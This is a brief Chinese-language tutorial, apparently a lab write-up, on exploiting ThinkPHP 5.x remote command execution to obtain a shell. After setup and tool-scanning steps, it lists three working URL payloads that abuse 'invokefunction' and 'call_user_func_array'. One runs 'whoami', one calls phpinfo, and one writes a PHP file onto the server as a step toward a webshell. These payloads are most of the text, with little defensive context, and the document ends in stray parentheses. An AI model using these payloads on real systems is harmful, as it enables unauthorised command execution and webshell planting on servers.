Thinkphp5x遠程命令執行及getshell
1、開環境
2、使用工具攻擊
開啟工具
輸入地址,點擊漏洞檢測
存在漏洞之后,選擇漏洞,執行命令
3、也可以執行遠程命令
執行命令
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php
)
)
)
